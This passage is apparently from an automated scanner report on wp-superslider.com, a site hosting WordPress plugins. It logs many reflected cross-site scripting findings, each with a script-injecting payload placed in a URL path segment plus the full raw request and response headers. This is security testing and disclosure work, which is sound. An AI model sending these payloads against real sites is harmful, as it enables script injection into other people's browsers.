Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ab5"><script>alert(1)</script>b3f3e43ffe4 was submitted in the REST URL parameter 5. This input was echoed as b3ab5\"><script>alert(1)</script>b3f3e43ffe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-datab3ab5"><script>alert(1)</script>b3f3e43ffe4/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674567; expires=Thu, 02-Feb-2012 19:22:47 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a4e7"><script>alert(1)</script>bc1d9122022 was submitted in the REST URL parameter 6. This input was echoed as 8a4e7\"><script>alert(1)</script>bc1d9122022 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider8a4e7"><script>alert(1)</script>bc1d9122022/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e26"><script>alert(1)</script>3ef7b7b12e4 was submitted in the REST URL parameter 7. This input was echoed as 93e26\"><script>alert(1)</script>3ef7b7b12e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu93e26"><script>alert(1)</script>3ef7b7b12e4/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93d9"><script>alert(1)</script>b1176fcac2 was submitted in the REST URL parameter 8. This input was echoed as e93d9\"><script>alert(1)</script>b1176fcac2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/defaulte93d9"><script>alert(1)</script>b1176fcac2/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674572+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d43c"><script>alert(1)</script>997d41182e2 was submitted in the REST URL parameter 9. This input was echoed as 5d43c\"><script>alert(1)</script>997d41182e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css5d43c"><script>alert(1)</script>997d41182e2 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b259"><script>alert(1)</script>cf11bf0924a was submitted in the REST URL parameter 1. This input was echoed as 7b259\"><script>alert(1)</script>cf11bf0924a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site7b259"><script>alert(1)</script>cf11bf0924a/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83ff"><script>alert(1)</script>15d9ca5fa65 was submitted in the REST URL parameter 2. This input was echoed as b83ff\"><script>alert(1)</script>15d9ca5fa65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb83ff"><script>alert(1)</script>15d9ca5fa65/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30690"><script>alert(1)</script>04ae898bca was submitted in the REST URL parameter 3. This input was echoed as 30690\"><script>alert(1)</script>04ae898bca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins30690"><script>alert(1)</script>04ae898bca/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e0b"><script>alert(1)</script>4f3b7f24e7a was submitted in the REST URL parameter 4. This input was echoed as 86e0b\"><script>alert(1)</script>4f3b7f24e7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat86e0b"><script>alert(1)</script>4f3b7f24e7a/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45505"><script>alert(1)</script>a19c334793e was submitted in the REST URL parameter 5. This input was echoed as 45505\"><script>alert(1)</script>a19c334793e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js45505"><script>alert(1)</script>a19c334793e/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674587+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ed6"><script>alert(1)</script>4a164db4c66 was submitted in the REST URL parameter 6. This input was echoed as b0ed6\"><script>alert(1)</script>4a164db4c66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.jsb0ed6"><script>alert(1)</script>4a164db4c66 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46a7"><script>alert(1)</script>c8efbec0fa1 was submitted in the REST URL parameter 1. This input was echoed as e46a7\"><script>alert(1)</script>c8efbec0fa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitee46a7"><script>alert(1)</script>c8efbec0fa1/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e52"><script>alert(1)</script>c7eda42390 was submitted in the REST URL parameter 2. This input was echoed as d2e52\"><script>alert(1)</script>c7eda42390 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentd2e52"><script>alert(1)</script>c7eda42390/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65a5f"><script>alert(1)</script>825999123a4 was submitted in the REST URL parameter 3. This input was echoed as 65a5f\"><script>alert(1)</script>825999123a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins65a5f"><script>alert(1)</script>825999123a4/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
